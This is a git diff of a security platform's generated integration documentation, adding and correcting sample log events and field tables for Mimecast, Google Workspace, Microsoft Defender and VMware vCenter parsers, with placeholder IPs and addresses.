diff --git a/_shared_content/operations_center/integrations/generated/00bbde4f-cb17-4c3f-9f5e-a585fc7c8fc0.md b/_shared_content/operations_center/integrations/generated/00bbde4f-cb17-4c3f-9f5e-a585fc7c8fc0.md index f38e42f531..c7511a24b0 100644 --- a/_shared_content/operations_center/integrations/generated/00bbde4f-cb17-4c3f-9f5e-a585fc7c8fc0.md +++ b/_shared_content/operations_center/integrations/generated/00bbde4f-cb17-4c3f-9f5e-a585fc7c8fc0.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "gke_container_runtime2.json" diff --git a/_shared_content/operations_center/integrations/generated/021e9def-5a55-4369-941e-af269b45bef1.md b/_shared_content/operations_center/integrations/generated/021e9def-5a55-4369-941e-af269b45bef1.md index 4361e474c8..0cb5b1af08 100644 
--- a/_shared_content/operations_center/integrations/generated/021e9def-5a55-4369-941e-af269b45bef1.md +++ b/_shared_content/operations_center/integrations/generated/021e9def-5a55-4369-941e-af269b45bef1.md @@ -20,7 +20,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "auth-action-changed-login-id-to.json" diff --git a/_shared_content/operations_center/integrations/generated/02a74ceb-a9b0-467c-97d1-588319e39d71.md b/_shared_content/operations_center/integrations/generated/02a74ceb-a9b0-467c-97d1-588319e39d71.md index 26841e95eb..2ab2186c72 100644 --- a/_shared_content/operations_center/integrations/generated/02a74ceb-a9b0-467c-97d1-588319e39d71.md +++ b/_shared_content/operations_center/integrations/generated/02a74ceb-a9b0-467c-97d1-588319e39d71.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_aaatm.json" diff --git a/_shared_content/operations_center/integrations/generated/033cd098-b21b-4c9b-85c4-c8174c307e48.md b/_shared_content/operations_center/integrations/generated/033cd098-b21b-4c9b-85c4-c8174c307e48.md index 95fa39f117..72afcdfa8d 100644 --- a/_shared_content/operations_center/integrations/generated/033cd098-b21b-4c9b-85c4-c8174c307e48.md +++ b/_shared_content/operations_center/integrations/generated/033cd098-b21b-4c9b-85c4-c8174c307e48.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "amsi_detected_harmful_content.json" diff --git a/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c.md b/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c.md index c752f872de..086d07efa1 100644 --- a/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c.md +++ b/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. 
@@ -23,10 +23,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_journal.json" @@ -216,7 +215,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -245,3 +244,6 @@ The following table lists the fields that are extracted, normalized under the EC |`mimecast.siem.virus_found` | `keyword` | The name of the virus found on the email, if applicable. | |`source.ip` | `ip` | IP address of the source. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Mimecast/mimecast-email-security). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c_sample.md b/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c_sample.md new file mode 100644 index 0000000000..904e4b9374 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c_sample.md 
@@ -0,0 +1,114 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_journal" + + + ```json + { + "aggregateId": "vC80NNxvOWKkBPnzSs04FA_1715699686", + "processingId": "PGZfGuxEAu_kE-nGy1sjThBr5EYbm1ZcDKg-vXbRHLA_1715699686", + "accountId": "CDE22A102", + "timestamp": 1715699697146, + "senderEnvelope": "newsletter@stub.com", + "recipients": "neo@gmail.fr", + "direction": "Inbound", + "type": "journal", + "subtype": null, + "_offset": 105760, + "_partition": 137 + } + ``` + + + +=== "test_process" + + + ```json + { + "aggregateId": "J5JwSy0HNvG7AvCg1sgDvQ_1715708284", + "processingId": "hP5f7mBanAVkWJWfh4vYvca3zOi9I3jROBmH3Z_Kysk_1715708284", + "accountId": "CDE22A102", + "action": "Hld", + "timestamp": 1715708287466, + "senderEnvelope": "john.doe015@gmail.com", + "messageId": "", + "subject": "Moderate", + "holdReason": "Spm", + "totalSizeAttachments": "0", + "numberAttachments": "0", + "attachments": null, + "emailSize": "3466", + "type": "process", + "subtype": "Hld", + "_offset": 105825, + "_partition": 137 + } + ``` + + + +=== "test_process_with_attachment" + + + ```json + { + "processingId": "processingId", + "aggregateId": "aggregateId", + "numberAttachments": "2", + "attachments": "tpsreport.doc", + "subject": "siem_process - email subject line", + "senderEnvelope": "auser@mimecast.com", + "messageId": "messageId", + "eventType": "process", + "accountId": "C0A0", + "action": "Allow", + "holdReason": null, + "subType": "Allow", + "totalSizeAttachments": "642", + "timestamp": 1689685338609, + "emailSize": "56422" + } + ``` + + + +=== "test_receipt" + + + ```json + { + "aggregateId": "J5JwSy0HNvG7AvCg1sgDvQ_1715708284", + "processingId": 
"hP5f7mBanAVkWJWfh4vYvca3zOi9I3jROBmH3Z_Kysk_1715708284", + "accountId": "CDE22A102", + "timestamp": 1715708286579, + "action": "Acc", + "senderEnvelope": "john.doe@gmail.com", + "messageId": "", + "subject": "Moderate", + "recipients": "admin@mcfr2.pro", + "senderIp": "209.123.123.123", + "rejectionType": null, + "rejectionCode": null, + "direction": "Inbound", + "numberAttachments": "0", + "senderHeader": "john.doe@gmail.com", + "rejectionInfo": null, + "tlsVersion": "TLSv1.3", + "tlsCipher": "TLS_AES_256_GCM_SHA384", + "spamInfo": "[]", + "spamProcessingDetail": "{\"spf\":{\"allow\":true,\"info\":\"ALLOW\"},\"dkim\":{\"allow\":true,\"info\":\"ALLOW\"},\"dmarc\":{\"allow\":true,\"info\":\"ALLOW\"}}", + "virusFound": null, + "type": "receipt", + "subtype": "Acc", + "_offset": 105826, + "_partition": 137 + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md index 0df163a43e..ad6946d884 100644 --- a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md +++ b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md 
@@ -18,14 +18,14 @@ In details, the following table denotes the type of events produced by this inte | ---- | ------ | | Kind | `` | | Category | `authentication`, `configuration`, `file`, `iam`, `session` | -| Type | `access`, `admin`, `connection` | +| Type | `access`, `admin`, `change`, `connection` | ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_admin_sample1.json" 
@@ -727,6 +727,65 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_suspend_user.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-07-09T14:05:42.528Z\",\"uniqueQualifier\":\"0123456789101112131\",\"applicationName\":\"admin\",\"customerId\":\"C03foh000\"},\"etag\":\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL_9Z5X0\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.fr\",\"profileId\":\"102788027662650927386\"},\"ipAddress\":\"1.2.3.4\",\"events\":[{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"jdoe@test.fr\"}]}]}", + "event": { + "action": "SUSPEND_USER", + "category": [ + "configuration" + ], + "dataset": "admin#reports#activity", + "type": [ + "change" + ] + }, + "@timestamp": "2024-07-09T14:05:42.528000Z", + "cloud": { + "account": { + "id": "C03foh000" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.fr" + }, + "parameters": { + "name": "USER_EMAIL", + "value": "jdoe@test.fr" + } + } + }, + "network": { + "application": "admin" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "domain": "test.fr", + "email": "john.doe@test.fr", + "id": "102788027662650927386", + "name": "john.doe" + } + } + + ``` + + === "test_target_user.json" ```json 
@@ -955,6 +1014,8 @@ The following table lists the fields that are extracted, normalized under the EC |`google.report.chat.message.id` | `keyword` | Message id | |`google.report.chat.room.name` | `keyword` | Room name | |`google.report.meet.code` | `keyword` | Meet code | +|`google.report.parameters.name` | `keyword` | Name of the item associated with the activity | +|`google.report.parameters.value` | `keyword` | Value of the item associated with the activity | |`google.report.parameters.visibility` | `keyword` | Visibility of the Drive item associated with the activity | |`google.report.token.app_name` | `keyword` | Token authorization application name | |`google.report.token.type` | `keyword` | Token type | diff --git a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md index e441bc00a6..87d34bd726 100644 --- a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md +++ b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md @@ -968,6 +968,42 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_suspend_user" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-07-09T14:05:42.528Z", + "uniqueQualifier": "0123456789101112131", + "applicationName": "admin", + "customerId": "C03foh000" + }, + "etag": "BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL_9Z5X0", + "actor": { + "callerType": "USER", + "email": "john.doe@test.fr", + "profileId": "102788027662650927386" + }, + "ipAddress": "1.2.3.4", + "events": [ + { + "type": "USER_SETTINGS", + "name": "SUSPEND_USER", + "parameters": [ + { + "name": "USER_EMAIL", + "value": "jdoe@test.fr" + } + ] + } + ] + } + ``` + + + === "test_target_user" 
diff --git a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md index 27b255f1df..51c4448860 100644 --- a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md +++ b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md @@ -43,7 +43,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_alert_evidence.json" @@ -1087,6 +1087,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "2b684979d6174bad69d895c7d8a852e7b206b95f", "4d5b7b6c06159d6b967f2c2c73f10145" ], + "hosts": [ + "www.example.org" + ], "ip": [ "1.2.3.4", "5.6.7.8" 
@@ -1096,6 +1099,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "address": "1.2.3.4", "ip": "1.2.3.4", "port": 59985 + }, + "url": { + "domain": "www.example.org", + "registered_domain": "example.org", + "subdomain": "www", + "top_level_domain": "org" } } 
@@ -1153,6 +1162,47 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_device_process_created.json" + + ```json + + { + "message": "{\"time\": \"2024-08-01T18:30:14.6841985Z\", \"tenantId\": \"14c90b3a-ee5f-43fa-b406-0baa32d561ca\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-08-01T18:28:43.4289906Z\", \"properties\": {\"DeviceId\": \"1111111111111111111111111111111111111111\", \"DeviceName\": \"desktop01.example.org\", \"ReportId\": 4772, \"InitiatingProcessId\": null, \"InitiatingProcessCreationTime\": null, \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": null, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": \"syst\\u00e8me\", \"InitiatingProcessAccountDomain\": \"autorite nt\", \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"InitiatingProcess\\\":{},\\\"ClientMachine\\\":\\\"l-195hnx3\\\",\\\"IsRemoteMachine\\\":false}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": \"\", \"InitiatingProcessSHA256\": null, \"SHA256\": null, \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ProcessCreatedUsingWmiQuery\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": null, \"AccountSid\": null, \"RemoteDeviceName\": \"\", \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": 
null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-08-01T18:27:07.2126839Z\", \"MachineGroup\": null}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-08-01T18:27:07.212683Z", + "action": { + "type": "ProcessCreatedUsingWmiQuery" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "desktop01.example.org" + }, + "microsoft": { + "defender": { + "report": { + "id": "4772" + } + } + }, + "process": { + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" + } + } + } + + ``` + + === "test_device_process_events.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md index 96227c28f4..16f3caed07 100644 --- a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md +++ b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md 
@@ -827,6 +827,89 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_device_process_created" + + + ```json + { + "time": "2024-08-01T18:30:14.6841985Z", + "tenantId": "14c90b3a-ee5f-43fa-b406-0baa32d561ca", + "operationName": "Publish", + "category": "AdvancedHunting-DeviceEvents", + "_TimeReceivedBySvc": "2024-08-01T18:28:43.4289906Z", + "properties": { + "DeviceId": "1111111111111111111111111111111111111111", + "DeviceName": "desktop01.example.org", + "ReportId": 4772, + "InitiatingProcessId": null, + "InitiatingProcessCreationTime": null, + "InitiatingProcessCommandLine": null, + "InitiatingProcessParentFileName": null, + "InitiatingProcessParentId": null, + "InitiatingProcessParentCreationTime": null, + "InitiatingProcessSHA1": null, + "InitiatingProcessMD5": null, + "InitiatingProcessFileName": null, + "InitiatingProcessFolderPath": null, + "InitiatingProcessAccountName": "syst\u00e8me", + "InitiatingProcessAccountDomain": "autorite nt", + "SHA1": null, + "MD5": null, + "FileName": null, + "FolderPath": null, + "AccountName": null, + "AccountDomain": null, + "AdditionalFields": "{\"InitiatingProcess\":{},\"ClientMachine\":\"l-195hnx3\",\"IsRemoteMachine\":false}", + "InitiatingProcessAccountSid": null, + "AppGuardContainerId": "", + "InitiatingProcessSHA256": null, + "SHA256": null, + "RemoteUrl": null, + "ProcessCreationTime": null, + "ProcessTokenElevation": null, + "ActionType": "ProcessCreatedUsingWmiQuery", + "FileOriginUrl": null, + "FileOriginIP": null, + "InitiatingProcessLogonId": null, + "AccountSid": null, + "RemoteDeviceName": "", + "RegistryKey": null, + "RegistryValueName": null, + "RegistryValueData": null, + "LogonId": null, + "LocalIP": null, + "LocalPort": null, + "RemoteIP": null, + "RemotePort": null, + "ProcessId": null, + "ProcessCommandLine": null, + "InitiatingProcessAccountUpn": null, + "InitiatingProcessAccountObjectId": null, + "FileSize": null, + "InitiatingProcessFileSize": null, + 
"InitiatingProcessVersionInfoCompanyName": null, + "InitiatingProcessVersionInfoProductName": null, + "InitiatingProcessVersionInfoProductVersion": null, + "InitiatingProcessVersionInfoInternalFileName": null, + "InitiatingProcessVersionInfoOriginalFileName": null, + "InitiatingProcessVersionInfoFileDescription": null, + "InitiatingProcessSessionId": null, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "CreatedProcessSessionId": null, + "IsProcessRemoteSession": false, + "ProcessRemoteSessionDeviceName": null, + "ProcessRemoteSessionIP": null, + "Timestamp": "2024-08-01T18:27:07.2126839Z", + "MachineGroup": null + }, + "Tenant": "DefaultTenant" + } + ``` + + + === "test_device_process_events" diff --git a/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4.md b/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4.md index 7d5c73a032..c5baf2fdfa 100644 --- a/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4.md +++ b/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4.md 
@@ -21,7 +21,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "connections_logs.json" 
@@ -268,6 +268,93 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "other_tests_example1_type_7.json" + + ```json + + { + "message": "Event [11111111] [1-1] [2024-06-18T23:41:05.366919Z] [vim.event.ScheduledTaskCompletedEvent] [info] [com.vmware.vcIntegrity] [] [22222222] [Task VMware vSphere Update Manager Check Notification on Datacenters in datacenter completed successfully]", + "event": { + "category": [ + "network" + ], + "code": "vim.event.ScheduledTaskCompletedEvent", + "reason": "Task VMware vSphere Update Manager Check Notification on Datacenters in datacenter completed successfully", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-06-18T23:41:05.366919Z", + "log": { + "level": "info" + }, + "observer": { + "product": "VCenter", + "vendor": "VMWare" + }, + "related": { + "user": [ + "com.vmware.vcIntegrity" + ] + }, + "source": { + "user": { + "name": "com.vmware.vcIntegrity" + } + }, + "vmware_vcenter": { + "event_id": "11111111" + } + } + + ``` + + +=== "other_tests_example2_type_7.json" + + ```json + + { + "message": "Event [11111111] [1-1] [2024-06-18T23:28:06.155764Z] [vim.event.EventEx] [info] [System] [Datacenter] [11111111] [Hardware Sensor Status: Processor Green, Memory Green, Fan Green, Voltage Green, Temperature Green, Power Green, System Board Green, Battery Green, Storage Green, Other Green]", + "event": { + "category": [ + "authentication" + ], + "code": "vim.event.EventEx", + "reason": "Hardware Sensor Status: Processor Green, Memory Green, Fan Green, Voltage Green, Temperature Green, Power Green, System Board Green, Battery Green, Storage Green, Other Green", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-18T23:28:06.155764Z", + "host": { + "name": "Datacenter" + }, + "log": { + "level": "info" + }, + "observer": { + "product": "VCenter", + "vendor": "VMWare" + }, + "related": { + "user": [ + "System" + ] + }, + "source": { + "user": { + "name": "System" + } + }, + 
"vmware_vcenter": { + "event_id": "11111111" + } + } + + ``` + + === "others_events.json" ```json @@ -372,7 +459,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "2023-05-11T10:22:26.181+0000: 23134193.224: [GC (Allocation Failure)", + "message": "2023-05-11T10:22:26.181+0000: 23134193.224: [GC (Allocation Failure)]", "event": { "category": [ "network" @@ -392,30 +479,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "others_events_type4.json" - - ```json - - { - "message": "Desired survivor size 1572864 bytes, new threshold 1 (max 15)", - "event": { - "category": [ - "network" - ], - "reason": "Desired survivor size 1572864 bytes, new threshold 1 (max 15)", - "type": [ - "connection" - ] - }, - "observer": { - "product": "VCenter", - "vendor": "VMWare" - } - } - - ``` - - === "others_events_type5.json" ```json @@ -544,7 +607,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "WeakReference, 0 refs, 0.0000061 secs]", + "reason": "WeakReference, 0 refs, 0.0000061 secs", "type": [ "connection" ] @@ -569,7 +632,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "FinalReference, 150 refs, 0.0004388 secs]", + "reason": "FinalReference, 150 refs, 0.0004388 secs", "type": [ "connection" ] @@ -594,7 +657,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "PhantomReference, 0 refs, 0 refs, 0.0000065 secs]", + "reason": "PhantomReference, 0 refs, 0 refs, 0.0000065 secs", "type": [ "connection" ] @@ -619,7 +682,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "JNI Weak Reference, 0.0000149 secs]", + "reason": "JNI Weak Reference, 0.0000149 secs", "type": [ "connection" ] 
@@ -644,7 +707,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "SoftReference, 0 refs, 0.0000457 secs]", + "reason": "SoftReference, 0 refs, 0.0000457 secs", "type": [ "connection" ] @@ -843,14 +906,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "127.0.0.1" + ], + "user": [ + "root" ] }, + "user": { + "name": "root" + }, "user_agent": { "device": { "name": "Other" }, "name": "Other", - "original": "pyvmomi Python/3.8.13 (VMkernel; 7.0.3; x86_64))", + "original": "pyvmomi Python/3.8.13 (VMkernel; 7.0.3; x86_64)", "os": { "name": "Other" } @@ -865,6 +934,64 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "session_logs_type3_wo_hostname.json" + + ```json + + { + "message": "Event [11111111] [1-1] [2024-06-18T22:45:08.003776Z] [vim.event.UserLogoutSessionEvent] [info] [root\\example] [] [22222222] [User root\\example@127.0.0.1 logged out (login time: Tuesday, 18 June, 2024 10:45:07 PM, number of API invocations: 2, user agent: VMware vim-java 1.0)]", + "event": { + "category": [ + "authentication" + ], + "code": "vim.event.UserLogoutSessionEvent", + "type": [ + "end" + ] + }, + "@timestamp": "2024-06-18T22:45:08.003776Z", + "host": { + "ip": "127.0.0.1" + }, + "log": { + "level": "info" + }, + "observer": { + "product": "VCenter", + "vendor": "VMWare" + }, + "related": { + "ip": [ + "127.0.0.1" + ], + "user": [ + "example" + ] + }, + "user": { + "domain": "root", + "name": "example" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "VMware vim-java 1.0", + "os": { + "name": "Other" + } + }, + "vmware_vcenter": { + "api_invocations": "2", + "event_id": "11111111", + "login_time": "Tuesday, 18 June, 2024 10:45:07 PM" + } + } + + ``` + + === "session_logs_type4.json" ```json 
